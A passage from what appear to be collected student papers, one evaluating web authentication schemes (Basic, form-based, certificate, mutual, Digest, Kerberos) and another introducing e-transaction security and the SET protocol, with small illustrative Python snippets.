password of the client. The client then submits his/her username and password to the
server and awaits validation. The server validates the credentials and if successful, the
server returns the requested resource to the client.
Fig 1. Using HTTP Basic Authentication to authenticate a client to a server. (Source:
http://download.oracle.com/javaee/1.4/tutorial/doc/Security5.html)
Fig 2. HTTP basic authentication to connect to a secured server: requesting a username and
password. (Source: http://wiki.openqa.org/display/WTR/Basic+Authentication)
Advantages and Disadvantages of HTTP Basic Authentication
Advantages: Basic access authentication is supported by all web browsers and is a
relatively simple scheme to implement. Credentials are cached for the session, which
allows the user to access the server multiple times without having to log in each
time.
Disadvantages: HTTP basic authentication is not particularly secure. It sends
usernames and passwords over the Internet as unencrypted plaintext, and thus relies
on the connection being secure or trusted so that no interception occurs. A further
problem is that the target server is not authenticated, increasing the possibility of
man-in-the-middle attacks.
Although the caching of sessions serves as a convenience, it is also insecure.
Information is retained in session caches until the user clears his/her browsing history.
This means that if the user does not properly log off the server, his/her information is
still within the cache and another user would be able to access his/her session without
any passwords required [16].
Form Based Authentication. Form based authentication may seem somewhat similar
to HTTP basic authentication. However, it does not use HTTP authentication
techniques. Instead, it uses HTML form fields for the username and password values
[16].
Implementation of Form Based Authentication. With form based authentication, the
server first checks whether the client is authenticated. If so, the server returns a
reference to the requested resource. Otherwise, the user is presented with a 'form'
to fill in, which gives the method its name. The user fills in the form, much as in a
login, before being granted access to the site. If the login succeeds, the server
redirects the client to the resource; upon failure, the client is redirected to an
error page.
Fig 3. Using Form Based Authentication to authenticate a client to a server (Source:
http://download.oracle.com/javaee/1.4/tutorial/doc/Security5.html)
Advantages and Disadvantages of Form Based Authentication
Advantages: Sessions are timed: after a certain amount of idle time, the session ends
and the user must log in to the server again. This improves security slightly over
HTTP basic authentication in the case where a user forgets to log off, and is
particularly useful for public access machines such as computer terminals in airports
and LAN shops.
Disadvantages: Form based authentication has the same security issues as basic
HTTP authentication, where passwords are sent in plaintext. The target server is also
not authenticated.
Client-Certificate Authentication. Client certificate authentication uses HTTP over
Secure Sockets Layer (SSL). This procedure does not occur at the message layer
using user IDs and passwords or tokens. Instead, the authentication occurs during the
handshake using SSL certificates. [27]
Implementation of Client-Certificate Authentication. The client authenticates the
server through public key certificates, which use a digital signature to bind a
public key to an identity, i.e. information such as the name of a person or
organization, making the exchange secure. The public key certificate is issued by a
trusted organization, a certificate authority (CA) such as VeriSign [18],[29].
The authentication uses public-key encryption and digital signatures to confirm that
the server is who it claims to be. Upon authentication, the client and server use
symmetric-key encryption to encrypt all the information exchanged.
Advantages and Disadvantages of Client-Certificate Authentication
Advantage: Authenticity is offered in the verification of the owner through the
additional information given, such as the name of the person or organization.
Confidentiality is ensured in that the data transferred is not disclosed to
unauthorized people, and integrity in that any modification of data can be made only
by the authorized person or company. As such, a modification or transaction cannot
later be denied by the participant, ensuring non-repudiation [13],[17].
Disadvantage: Cost is the main disadvantage. To obtain a trusted infrastructure, the
user needs to validate his/her identity with a trusted organization such as VeriSign
[28]. Performance is another disadvantage, owing to the larger amount of resources
required because the information sent is encrypted.
Fig 4. Client-certificate authentication utilized in PayPal as a proof to clients that it is a
legitimate server. Certificate is verified by VeriSign. (Source: RedHat, Certificates and
Authentication)
Mutual Authentication. Mutual authentication, also known as two-way authentication,
is a security process in which both entities in a communications link authenticate
each other. In a network environment, the end user (client side) must prove his/her
identity to the web application provider (server side), and the server must prove its
identity to the client, before any application traffic is sent over the connection.
In other words, a connection can occur only when the client trusts the server's
digital certificate and the server trusts the client's certificate [33]. Mutual
authentication should not be confused with the two-factor authentication that
electronic banking websites commonly implement.
Implementation of Mutual Authentication. The exchange of certificates is carried out
by means of the Transport Layer Security (TLS) protocol. A connection is possible
only after the certificates have been exchanged and the connection properties set up,
a process called the Secure Sockets Layer (SSL) handshake. If the client's keystore
contains more than one certificate, the certificate with the latest timestamp is used
to authenticate the client to the server [25]. This reduces the risk that an
unsuspecting network user carelessly reveals account credentials to malicious
websites. It is best implemented with HTTP over SSL for added security.
Fig 5. Using Mutual Authentication to verify the authenticity of both the client and server.
(Source: http://download.oracle.com/javaee/1.4/tutorial/doc/Security5.html)
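In Python's standard `ssl` module, the server-side half of this arrangement amounts to demanding a client certificate during the handshake. The sketch below only configures the context; loading the actual certificate files is deployment-specific and omitted here:

```python
import ssl

# Server-side TLS context: the server will present its own certificate
# and, with CERT_REQUIRED, refuse any client that cannot present a
# certificate signed by a CA the server trusts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.verify_mode = ssl.CERT_REQUIRED

print(context.verify_mode == ssl.CERT_REQUIRED)  # True
```

In a real deployment, the context would also load the server's key pair with `load_cert_chain()` and the trusted client CAs with `load_verify_locations()` before wrapping sockets.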
Advantages and Disadvantages of Mutual Authentication
Advantage: By using the mutual authentication method, end users can be assured that
they are communicating with legitimate web applications, and servers can ensure that
all users are attempting to gain access for legitimate purposes. It prevents attackers
from impersonating entities to steal users’ account credentials in order to commit
fraud [15]. Mutual authentication can also prevent various forms of online fraud such
as man-in-the-middle attacks, malware, shoulder surfing, keystroke logging and
pharming. It minimizes the risk of online fraud in electronic banking or commerce
activities.
Disadvantage: However, most web applications are designed so that no client-side
certificates are required [14], because of issues of cost and complexity. This lack
of mutual authentication creates opportunities for man-in-the-middle attacks. Besides
that, the management of root certificate authorities in client browsers, applications
and operating systems is critically important: an attacker who can alter the digital
certificates of certificate authorities (CAs) in a client's browser can trick the
client into believing a malicious website is legitimate.
Digest Authentication. Digest authentication is a method in which a request from a
potential user is received by a network server and then sent to a domain controller
[30]. The controller returns a digest session key to the server that received the
request. The user then generates an encrypted response and sends it to the server;
if the response is correct, the server grants the user access to the web application
for a single session.
Implementation of Digest Authentication. The authentication is based on a simple
challenge-response paradigm. The server generates a challenge using a nonce value. A
valid response from the client contains (by default) an MD5 checksum of the username,
password, the nonce value provided, the HTTP method, and the requested URI. The form
of this response is specified in RFC 2617 [24]. The MD5 digest is a 128-bit hash
value intended to be a one-way message digest, although studies have shown that MD5
is breakable and not collision resistant [33].
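The RFC 2617 response, in its simplest form (without the optional qop directive), chains three MD5 hashes. The realm, nonce, and credentials below are invented for illustration:

```python
import hashlib

def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

username, realm, password = "HarryPotter", "hogwarts", "Gryffindor"
nonce = "dcd98b7102dd2f0e8b11d0f600bfb0c0"   # server-supplied challenge
method, uri = "GET", "/protected/index.html"

ha1 = md5_hex(f"{username}:{realm}:{password}")  # may be stored server-side
ha2 = md5_hex(f"{method}:{uri}")
response = md5_hex(f"{ha1}:{nonce}:{ha2}")

print(len(response))  # 32 hex digits; sent in place of the password
```

The server repeats the same computation with its stored HA1 and compares the results; the plaintext password never crosses the network.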
Advantages and Disadvantages of Digest Authentication
Advantage: Digest authentication was developed to tackle the fundamental problem of
basic authentication, the plaintext transmission of the user's password over the
network. The user's password is not used directly in the MD5 digest, which allows
some implementations to store the digest values instead of the plaintext password. A
client nonce in the response allows the client to prevent chosen-plaintext attacks.
The server nonce can include timestamps, allowing the server to inspect nonce
attributes sent by clients to prevent replay attacks. Lastly, the server may maintain
a list of recently issued server nonce values to prevent reuse.
Disadvantage: In general, digest authentication is an enhanced form of single-factor
authentication, and single-factor authentication is vulnerable to man-in-the-middle
attacks. It has no mechanism for clients to verify the server's legitimacy.
Furthermore, most of the security options specified in RFC 2617 are optional; if the
server is not strict about the quality of protection, the client may fall back to the
lower-security RFC 2069 digest authentication, which is itself open to a
man-in-the-middle attacker who instructs clients to use it [23]. Another weakness
lies in the passwords, which must be stored in a reversibly encrypted form so that
the server can access them and run them through checksum algorithms [26]. This
method is not as secure as client-certificate or mutual authentication, but it is
better than basic access authentication.
Kerberos. Kerberos was created at the Massachusetts Institute of Technology as a
solution to network security problems. Kerberos is a network authentication protocol
designed to provide strong authentication for client/server applications using
secret-key cryptography. It provides authentication tools and strong cryptography
over the network to help a client prove its identity to a server (and vice versa)
across an insecure network connection [3]. Thereafter, communication between the
client and server is encrypted to assure privacy and data integrity.
Implementation of Kerberos. Kerberos works by encrypting data with a symmetric
key where the details are sent to a key distribution center (KDC) instead of directly
between each computer. The KDC maintains a database of secret keys where each
entity on the network (either client or server) shares a secret key known only to itself
and to the KDC [19]. The KDC consists of two logically separate parts: an
Authentication Server (AS) to prove an entity's identity using knowledge of the secret
key and a Ticket Granting Server (TGS) to generate a session key for encrypting
transmissions during communication.
When the client logs in with its password, the AS verifies the client's identity and
grants it a Ticket Granting Ticket (TGT) [20]. The TGT contains identification
credentials such as a randomly created session key, together with a timestamp and a
lifetime of about eight hours. When the client wants to contact some service server
(SS), it contacts the TGS, using the ticket to prove its identity, and asks for a
service. The client can (re)use this ticket as long as it has not expired. If the
client is eligible for the service, the TGS sends another ticket to the client. The
client then contacts the SS and uses this second ticket to authenticate itself and
prove that it has approval to receive the service.
Advantages and Disadvantages of Kerberos
Advantages: Kerberos protocol messages are protected against eavesdropping and replay
attacks [1]. Users' passwords are never sent across the network, in either encrypted
or plain text, preventing password sniffing [12]. In addition, secret keys are only
sent across the network in encrypted form. Hence, the contents of snooped and logged
conversations on an insecure network do not contain enough information for an
attacker to impersonate an authenticated user or an authenticated target service.
Kerberos also puts timestamps and lifetime information into the tickets passed
between clients and servers to secure communications within the network [12]. Using
ticket lifetimes no longer than the estimated time a hacker would need to crack the
ticket's encryption helps prevent brute-force and replay attacks. Furthermore,
because of these time-outs, users must periodically request new authentication, so
hackers constantly encounter fresh cryptographic ciphers to decode and have
insufficient time to break any one cipher.
Kerberos supports mutual authentication, which helps prevent man-in-the-middle
attacks: the client and server systems authenticate each other and can be certain
that they are communicating with a genuine partner [21].
Apart from being an authentication protocol in its own right, Kerberos can also be
integrated with a second authentication factor, such as a one-time password (OTP).
Furthermore, Kerberos provides a layer of security in areas where a firewall cannot
be depended upon.
Disadvantages: The Kerberos system requires the continuous availability of a central
server; if the Kerberos server is down, no one can log in [3]. Kerberos is also not
well suited to persistent connections, because of the limited lifetime of the tickets
and session keys used for encryption. As tickets are time-stamped, Kerberos has
strict time requirements and needs the clocks of the involved hosts to be
synchronized within the configured limits; authentication fails if the clock times
are more than five minutes apart.
The Kerberos authentication model is also vulnerable to brute-force attacks against
the KDC [12]. Since the entire authentication system depends on the KDC, any
compromise of the KDC allows an attacker to impersonate any user. Moreover, Kerberos
was designed for use with single-user client systems, but not all client systems are
single-user [12]; on a multi-user system, the Kerberos authentication scheme is still
susceptible to a variety of ticket-stealing and replay attacks.
3 Suggestions to Web Developers
Web developers intending to secure their applications would have to consider the
different kinds of password authentication methods to employ to suit their web
applications. Some factors to consider that may affect the choice of authentication
would be cost and efficiency issues.
Twitter and Basic Authentication. Before 10th August 2010, Twitter made use of
basic authentication for logging into the Twitter server. The switch to another form of
authentication, Open Authorization (OAuth) was made due to the lack of security that
basic authentication provides. With basic authentication, the client provides his/her
username and password to third parties over the network in plaintext whenever a new
page is requested. This makes it very easy for packet sniffers to intercept passwords.
Also, the server stores passwords, making it a liability in the case when passwords are
leaked.
In addition to that, the performance of basic authentication is rather inefficient. Every
page requested by the client would require a lookup for the user in the database. This
would result in a less efficient server, especially when a large number of people are
using the server.
Therefore, although basic authentication is the simplest form of authentication
available, it is not particularly secure and is easy to defeat when any malicious
attempt is made. Basic authentication may suffice only where the web application has
little need for security, such as a simple personal project. In a more
security-sensitive setting, such as banking services, basic authentication should not
be used.
Facebook and HTTPS. Facebook, one of the most popular social media sites used by
millions around the world would require a reasonable level of security. The numerous
photos posted on Facebook with people tagged require a higher level of security for
the sake of personal privacy. The developers of Facebook realize the need for such
security and have obtained SSL certificates which allow users to browse over HTTPS.
Some issues regarding HTTPS are cost and latency. Licensing a certificate costs over
$1,000 for a single year, and it is because of this high cost that some web
developers shy away from such licenses to keep expenses at a minimum. In the case of
Facebook, however, this cost is essential and should not be avoided, as it secures
the privacy of millions of users.
Latency is due to the fact that there are more steps to carry out for verification
(‘handshakes’) as opposed to basic authentication. These extra handshakes are
necessary in HTTPS authentication before data is sent to the client. Nevertheless, the
slight latency is a small price to pay for security. In fact, with the advancement of
technology, latency would be improved as networks develop.
Financial Industry and Mutual Authentication. In the financial industry, both users
and banking systems need assurance that the other party is authentic. This is
important so that bank customers do not leak their credentials to phishing websites,
while the system admits only genuine bank customers. Mutual authentication is
considered a secure method for this process. However, few financial organizations
implement it, because of the high implementation cost: a public key certificate
issued by a trusted certificate authority (CA) such as VeriSign is expensive, so it
is hard for general users to obtain a public key for the servers to identify them by.
Bank customers can verify the public key of an Internet banking website such as DBS
Bank Ltd (internet-banking.dbs.com.sg) since the identity of DBS Bank Ltd has been
verified by VeriSign. Users can be assured that they are communicating with the
legitimate DBS website. On the other side, the DBS web server is unable to check the
legitimacy of individual clients from their digital certificates. The web server
attempts to match the signature on the client certificate to a known CA using the web
server's certificate store; if the client's certificate is not registered under any
CA, a web server using mutual authentication can simply refuse connections from that
unauthenticated client. Hence, banking systems have to use other security methods,
such as two-factor authentication involving a token and a password, to make the
authentication process more robust.
Digest Authentication. Nowadays, more e-commerce websites are using SSL to protect
users' login credentials. These websites often buy a costly SSL server digital
certificate from a CA and use it only for authentication, because full SSL encryption
seriously taxes a web server under heavy load. For example, Microsoft Hotmail uses
SSL only to encrypt its users' login page, then switches to unencrypted HTTP
afterwards. Moreover, even where SSL is used, many web applications still store
users' passwords in plain text in the database, so an attacker can easily retrieve
all the credentials if the web server is compromised.
Hence, digest authentication is a fairly secure and cheaper authentication method for
web application developers to consider. With digest authentication, users' login
credentials are never transmitted across the network, nor are they stored in the
database in plain text. Web developers with fewer financial resources do not need to
purchase expensive digital certificates every year. Furthermore, the authentication
is performed by the web server itself; the web application merely has to ensure that
authentication is in place. The digest authentication protocol uses hashes instead of
plain text, and while web developers may build their own hash-based authentication
mechanism, it is much more reliable to use an existing digest mechanism. However,
digest authentication is suitable only for protecting usernames and passwords; SSL
remains the best method if the content being transmitted needs protection or the
users need assurance that they are connecting to the legitimate server. Web
application developers should also note that digest authentication is a single-factor
method and thus subject to the weaknesses of traditional authentication methods.
Kerberos. Kerberos is a viable and powerful solution to network security problems. It
is an open standard managed by the Internet Engineering Task Force (IETF) [19]. Many
operating systems, such as IBM's AIX, Linux, Apple's Mac OS X and Microsoft's
Windows, use it for authentication in most of their login modules [22]. In addition,
many remote login applications available on UNIX-like systems, including OpenSSH,
telnet and rlogin, have Kerberized versions. Kerberos is used by both mainstream
vendors and open source projects [32]. Numerous improvements have been made to
Kerberos as the working model has matured over the years; it now supports multiple
cryptographic algorithms, scalable systems and more. Given that Kerberos is mature,
in place in many operating systems and applications, and architecturally sound [22],
it is a very feasible authentication system to use.
While Kerberos is now stable and secure, there may be factors deterring its use.
Kerberos is much more complicated than the other authentication methods discussed,
and to keep things simple, web developers may shy away from it. Cost may be another
factor, but Kerberos is available free on open source platforms. One thing to note,
however, is that open source and commercial Kerberos systems may differ, so
developers need to weigh the factors well when choosing which Kerberos system to use.
4 Conclusion
In conclusion, we started off by discussing the vulnerabilities of web applications
and the possible authentication attacks, then presented authentication methods that
can help counter some of those attacks, and ended with an evaluation of these methods
and some suggestions for web developers to consider when choosing among them.
Technology will change, new hacking methods will emerge, and authentication methods
will need to change correspondingly to counter those attacks. There is no one perfect
solution to security problems; web developers will have to continuously review their
authentication techniques to protect the privacy of their systems and users.
Table 1. Overview of comparison among different authentication techniques.

Basic Authentication
  Security level: Low
  Methods: Passwords sent as plaintext.
  Vulnerability: Man-in-the-middle attacks.

Form-based Authentication
  Security level: Low
  Methods: Passwords sent as plaintext; logout after inactivity of a certain period.
  Vulnerability: Man-in-the-middle attacks.

HTTPS/SSL
  Security level: High
  Methods: Client authenticates server through public key certificates.
  Vulnerability: Possibility of server’s public key being altered, leading to the
  client believing the (altered) key is legitimate.

Mutual Authentication
  Security level: High
  Methods: Exchange of certificates between client and server.
  Vulnerability: Most web applications do not require client-side certificates.

Digest Authentication
  Security level: Medium
  Methods: Simple challenge-response paradigm with a digest session key.
  Vulnerability: Man-in-the-middle attacks; password stored in a reversibly
  encrypted form; no mechanism to identify the server’s legitimacy.

Kerberos
  Security level: High
  Methods: Passwords are never sent across the network; only secret keys in
  encrypted form are sent.
  Vulnerability: Brute-force attacks against the KDC; susceptible to
  ticket-stealing and replay attacks.
References
1. Aldinger, T. (n.d.). What Are the Advantages of Kerberos? | eHow.com. Retrieved
   October 15, 2011, from eHow:
   http://www.ehow.com/list_5981928_advantages-kerberos_.html
2. Arumugam, P. (2002, December 12). J2EE Form-based Authentication. Retrieved
   October 13, 2011, from O'Reilly on Java:
   http://onjava.com/pub/a/onjava/2002/06/12/form.html
3. Bezroukov, N. (2010, May 06). Kerberos. Retrieved October 14, 2011, from
   Softpanorama: http://www.softpanorama.org/Authentication/kerberos.shtml
4. Conjecture Corporation. (2011). What is a Brute Force Attack. Retrieved October 8,
   2011, from WiseGeek: http://www.wisegeek.com/what-is-a-brute-force-attack.htm
5. Conjecture Corporation. (2011). What is a Dictionary Attack. Retrieved October 8,
   2011, from WiseGeek: http://www.wisegeek.com/what-is-a-dictionary-attack.htm
6. Conjecture Corporation. (2011). What is a Phishing Scam. Retrieved October 8, 2011,
   from WiseGeek: http://www.wisegeek.com/what-is-a-phishing-scam.htm
7. Conjecture Corporation. (2011). What is Network Sniffing. Retrieved October 9,
   2011, from WiseGeek: http://www.wisegeek.com/what-is-network-sniffing.htm
8. Conjecture Corporation. (2011). What is Session Hijacking. Retrieved October 8,
   2011, from WiseGeek: http://www.wisegeek.com/what-is-session-hijacking.htm
9. Conjecture Corporation. (2011). What is Spyware. Retrieved October 8, 2011, from
   WiseGeek: http://www.wisegeek.com/what-is-spyware.htm
10. Conjecture Corporation. (2011). What is Pharming. Retrieved October 8, 2011, from
    WiseGeek: http://www.wisegeek.com/what-is-pharming.htm
11. Doshi, P., & Siddharth, S. (2010, November 2). Five common Web application
    vulnerabilities. Retrieved October 9, 2011, from Symantec Connect:
    http://www.symantec.com/connect/articles/five-common-web-application-vulnerabilities
12. Duke University. (n.d.). Kerberos: Advantages and Weaknesses. Retrieved October
    15, 2011, from Duke University: http://www.duke.edu/~rob/kerberos/kerbasnds.html
13. Dun & Bradstreet. (n.d.). Trust in Secure Identity. Retrieved October 3, 2011,
    from Dun & Bradstreet:
    http://www.dnb.com/US/communities/ecommerce/trust_secure.asp
14. Federal Financial Institutions Examination Council. (2001). Authentication in an
    Internet Banking Environment. Retrieved October 15, 2011, from Federal Financial
    Institutions Examination Council:
    http://www.ffiec.gov/pdf/authentication_guidance.pdf
15. Financial Services Technology Consortium. (2005). FSTC Blueprint for Mutual
    Authentication: Phase 1. Retrieved October 15, 2011, from Financial Services
    Technology Consortium:
    http://www.fstc.org/projects/docs/FSTC_Better_Mutication_v11.pdf
16. GlobalSCAPE, Inc. (n.d.). GlobalSCAPE Knowledge Base. Retrieved October 7, 2011,
    from GlobalSCAPE: http://kb.globalscape.com/KnowledgebaseArticle10691.aspx
17. IBM. (2010, September 20). Secure Sockets Layer client certificate authentication.
    Retrieved September 24, 2011, from IBM: WebSphere Application Server:
    http://publib.boulder.ibm.com/infocenter/wasinfo/v6r0/index.jsp?topic=%2Fcom.ibm.websphere.express.doc%2Finfo%2Fexp%2Fae%2Frsec_csiv2cca.html
18. IIS Admin Blog. (2007, October 8). How to Secure a Web Site Using Client
    Certificate Authentication. Retrieved September 24, 2011, from IIS Admin Blog:
    http://www.iisadmin.co.uk/?p=11
19. Kerberos (protocol) - Wikipedia, the free encyclopedia. (n.d.). Retrieved October
    14, 2011, from Wikipedia: http://en.wikipedia.org/wiki/Kerberos_(protocol)
20. Learn Networking. (2008, January 28). How Kerberos Authentication Works. Retrieved
    October 15, 2011, from Learn Networking:
    http://learn-networking.com/network-security/how-kerberos-authentication-works
21. McGowan, L. (2011, June 02). What Are the Advantages of Kerberos Authentication?
    | eHow.com. Retrieved October 15, 2011, from eHow:
    http://www.ehow.com/info_8527576_advantages-kerberos-authentication.html
22. MIT Kerberos Consortium. (2008). kerberos.org. Retrieved October 25, 2011, from
    Kerberos: http://www.kerberos.org/software/whykerberos.pdf
23. Network Working Group. (1997). An Extension to HTTP: Digest Access
    Authentication. Retrieved October 10, 2011, from Network Working Group:
    http://tools.ietf.org/html/rfc2069
24. Network Working Group. (1999). HTTP Authentication: Basic and Digest Access
    Authentication. Retrieved October 15, 2011, from Network Working Group:
    http://tools.ietf.org/html/rfc2617
25. Oiwa, Y. (2008). HTTP Mutual Authentication Protocol Proposal. Research Centre
    for Information Security.
26. Open Web Application Security Project Foundation. (2010). Authentication in IIS.
    Retrieved October 16, 2011, from Open Web Application Security Project
    Foundation: https://www.owasp.org/index.php/Authentication_In_IIS
27. Red Hat. (n.d.). Red Hat. Retrieved October 3, 2011, from Red Hat Certificate
    System:
    http://docs.redhat.com/docs/en-US/Red_Hat_Certificate_System/8.0/html/Deployment_Guide/Introduction_to_Public_Key_Cryptography-Certificates_and_Authentication.html
28. SSL Shopper. (2011). Why SSL? The Purpose of using SSL Certificates. Retrieved
    October 13, 2011, from SSL Shopper:
    http://www.sslshopper.com/why-ssl-the-purpose-of-using-ssl-certificates.html
29. Sun Microsystems. (2005, December 6). Installing and Configuring SSL Support.
    Retrieved September 24, 2011, from The J2EE(TM) 1.4 Tutorial:
    http://java.sun.com/j2ee/1.4/docs/tutorial/doc/Security6.html#wp80737
30. Tech Target. (2007). Digest Authentication. Retrieved October 15, 2011, from Tech
    Target: http://searchsecurity.techtarget.com/definition/digest-authentication
31. Tech Target. (2007). Mutual Authentication. Retrieved October 15, 2011, from Tech
    Target: http://searchfinancialsecurity.techtarget.com/definition/mutual-authentication
32. University of Portsmouth. (2007, November 27). Kerberos - Commercial or Open
    Source? Retrieved October 25, 2011, from University of Portsmouth:
    http://mosaic.cnfolio.com/M591CW2007B103
33. Wang, X., & Yu, H. (n.d.). How to Break MD5 and Other Hash Functions. Retrieved
    October 15, 2011, from http://merlot.usc.edu/csac-f06/papers/Wang05a.pdf
34. Zaikin, M. (2005, March). Chapter 5. Web Application Security. Retrieved October
    11, 2011, from SCWCD 1.4 Study Guide: http://java.boot.by/wcdguide/ch05s03.html
Data Security for E-transactions:
Online Banking and Credit Card Payment System
Jun Lam Ho, Alvin Teh, Kaldybayev Ayan
Abstract. In this paper, we will explore the environment and protocols used for
online banking and credit card payment systems, including Secure Electronic
Transaction (SET), 3-D Secure and Hypertext Transfer Protocol Secure (HTTPS).
Subsequently, we will study the threats commonly faced by these systems. Finally,
we will analyze the current systems and offer alternative approaches that may help
to resolve the problem of the insecurity of current e-transaction systems.
1 Introduction
Today, in a generation of IT technologies, electronic transactions have made buying
and selling products easy and comfortable. An electronic transaction is the sale or
purchase of goods or services, whether between businesses, individuals, governments
or other public or private organizations, conducted over electronic systems such as
the Internet or other computer-mediated networks. Payment for goods can be made
using credit-card payment (offline) or online banking payment (online). Both of
these methods of paying are widespread around the world and play an important role
in making payment convenient for both parties.

Online banking (or Internet banking) allows customers to conduct financial
transactions on a secure website operated by their retail or virtual bank, credit
union or building society. The ancestor of modern online banking services was the
distance banking conducted over electronic media from the early 1980s, which became
popular through the use of a terminal (with keyboard and monitor) to access the
banking system over a phone line. Another feature was sending tones down a phone
line with instructions to the bank. At that time, some online banking services never
became popular and were commercial failures. Today, however, in a world of new
technologies, many banks are Internet-only banks. Unlike their predecessors, these
banks differentiate themselves by offering better interest rates and online banking
features.
Another popular type of payment today is payment using payment cards.
The term payment card covers a range of different cards that a cardholder can
present to make a payment; a payment card is basically attached to an account which
holds funds. Payment cards can be classified into categories such as credit cards,
debit cards, charge cards, stored-value cards and fleet cards. Of these, the most
popular are credit cards and debit cards; both provide an alternative payment method
to cash when making purchases.
Customers can also choose among a variety of e-check and e-cash systems.
Electronic money, or e-cash, refers to money that is exchanged only electronically.
Electronic money systems fall into three categories: centralized, decentralized and
offline anonymous systems. E-cash systems such as PayPal, WebMoney and cashU
function as centralized systems: they sell their electronic currency directly to the
end user. They have become popular too, since they allow online money transfers to
be used as electronic alternatives to paying with traditional paper methods, such as
checks and money orders.
Although new technologies make purchasing and selling goods convenient and make
online shopping possible, there is another problem which concerns users of these
systems: “Is it safe?”. Security is the most crucial aspect of e-transactions.
Without proper security, a system is open to attacks by hackers and to fraud,
causing a great deal of damage, mainly loss of funds and exposure of customers’
private information. Security is critical to the success of electronic commerce
over the Internet: without privacy, consumer protection cannot be guaranteed, and
without authentication, neither the merchant nor the consumer can be sure that valid
transactions are being made. That is why all popular e-transaction systems pay close
attention to the security of their systems and their customers.
1.1 Expanded CIA factors for e-transaction
E-transaction systems handle a huge number of transactions involving large sums of
money and sensitive customer information. These systems operate under a set of
security protocols and in an environment that differs from other information
systems. The main difference comes from the information these systems handle, which
is defined by a set of characteristics. We will take a look at the characteristics
of information that relate closely to e-transaction systems, to gain a better
understanding of the protocols and environment used to run these systems.

Confidentiality refers to the non-disclosure of information to unauthorized
personnel. This is achieved by means of the authentication provided by the
e-transaction system, which grants authorized users access rights to the accounts
they hold.

Integrity refers to the information being free from corruption and existing in a
complete form. Hashing is one of the methods used to verify the integrity of
information.

Availability refers to the ability of authorized users to gain access to information
when needed, without obstruction.

Authenticity refers to the quality of the information being genuine or original.
This is achieved, together with non-repudiation, by means of digital signatures and
public key encryption.

Accuracy refers to the information being free from error.
2 Protocols and Systems
2.1 Online shopping and payment
SET Protocol
Payment card systems mostly use Secure Electronic Transaction (SET). SET is an open
encryption and security specification designed to protect credit card transactions
on the Internet. It was developed by payment card companies such as Visa and
MasterCard, and was supported by IBM, Microsoft, Netscape and other companies. It
is a standard for protecting the privacy and ensuring the security of electronic
transactions. With SET, a customer is given an electronic wallet (digital
certificate), and a transaction is conducted and verified using digital certificates
and digital signatures among three parties: the purchaser, the seller, and the
purchaser’s bank. SET builds on a variety of security systems, such as Netscape’s
Secure Sockets Layer (SSL), Terisa Systems’ Secure Hypertext Transfer Protocol
(S-HTTP) and Microsoft’s Secure Transaction Technology (STT).
So what kind of encryption mechanisms does SET use?
The SET protocol uses several encryption mechanisms, as well as an authentication
mechanism. SET uses both symmetric and asymmetric (public key) encryption: the
symmetric Data Encryption Standard (DES) for the bulk of the data, and asymmetric
encryption to transmit the session keys for the DES transactions. The 56-bit session
keys are transmitted asymmetrically; the rest of the transaction uses symmetric
encryption in the form of DES.

In SET, message data is encrypted using a randomly generated symmetric key (a 56-bit
DES key). This key is in turn encrypted using the message recipient’s public key
(RSA). The result is the so-called “digital envelope” of the message. It combines
the encryption speed of DES with the key management advantages of RSA public-key
encryption. After encryption, the envelope and the encrypted message itself are sent
to the recipient. On receiving the encrypted data, the recipient first decrypts the
digital envelope using his or her private key to obtain the randomly generated
symmetric key, and then uses that symmetric key to unlock the original message.
However, 56-bit key encryption is weak and can be cracked using powerful hardware;
DES-cracking machines have been built in the past to obtain message data. This is
the main concern with SET, since DES encrypts the majority of a SET transaction.
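The envelope construction can be sketched as follows. This is a conceptual illustration only: a SHA-256-derived XOR keystream stands in for DES, and a textbook RSA key with tiny primes stands in for the recipient's 1024-bit RSA key; neither stand-in is remotely secure.

```python
import hashlib, os

def stream_cipher(key: bytes, data: bytes) -> bytes:
    """Symmetric stand-in for DES: XOR with a SHA-256-derived keystream."""
    out, counter = bytearray(), 0
    while len(out) < len(data):
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(b ^ k for b, k in zip(data, out))

# Textbook RSA with tiny primes (p=61, q=53): n=3233, e=17, d=2753.
N, E, D = 3233, 17, 2753

def rsa_encrypt_key(sym_key: bytes) -> list:
    return [pow(b, E, N) for b in sym_key]     # the "digital envelope"

def rsa_decrypt_key(envelope: list) -> bytes:
    return bytes(pow(c, D, N) for c in envelope)

# Sender: encrypt the message with a random symmetric key, wrap that key in RSA.
sym_key = os.urandom(7)                         # DES keys are 56 bits
ciphertext = stream_cipher(sym_key, b"PAN=4111111111111111")
envelope = rsa_encrypt_key(sym_key)

# Recipient: open the envelope first, then decrypt the message with the key inside.
recovered_key = rsa_decrypt_key(envelope)
plaintext = stream_cipher(recovered_key, ciphertext)
print(plaintext)   # b'PAN=4111111111111111'
```

The two-step decryption mirrors the text above: the slow asymmetric operation touches only the short key, while the fast symmetric cipher handles the message body.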
Another mechanism that SET uses is the digital signature based on asymmetric keys
(message digests). As mentioned above, in SET, public key cryptography is only used
to encrypt DES keys and for authentication (digital signatures), not for the main
body of the transaction. In SET, the RSA modulus is 1024 bits in length, and SET
uses a distinct public/private key pair to generate the digital signature. Each SET
member possesses two asymmetric key pairs: a key-exchange pair used in the process
of key encryption and decryption, and a “signature” pair for the creation and
verification of digital signatures (160-bit message digests). The hash algorithm
makes it computationally infeasible for two different messages to have the same
message digest.
Now let’s examine another mechanism that SET uses: the Dual Signature. Consider the
following picture.

Figure 1: SET protocol using Dual Signature [1]

1. In the picture above, the Payment Information (PI), which contains all the
   information about the cardholder’s card, is hashed to produce the Payment
   Information Message Digest (PIMD).
2. At the same time, the cardholder hashes the Order Information (OI) to get the
   Order Information Message Digest (OIMD).
3. Both message digests are then combined (and hashed) to get the Payment and Order
   Message Digest (POMD).
4. The cardholder then encrypts the POMD with his or her own private key to get the
   Dual Signature (DS).
5. After obtaining the Dual Signature, the cardholder sends:
   a. OI, PIMD and DS to the merchant;
   b. PI, OIMD and DS to the payment gateway. [1]
This method ensures that the merchant, who receives the Order Information, the
Payment Information Message Digest and the Dual Signature, cannot recover the
payment information and thus cannot learn the cardholder’s credit card number. But
since the merchant has received the Order Information, the merchant can start
processing the order. At the same time, the payment gateway, which has received the
Payment Information, deducts the amount from the cardholder’s account and sends it
to the merchant.
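The digest arithmetic behind this can be sketched with SHA-1 (SET's digests are 160-bit); the PI and OI values below are made-up, and the actual RSA signing of the POMD is omitted:

```python
import hashlib

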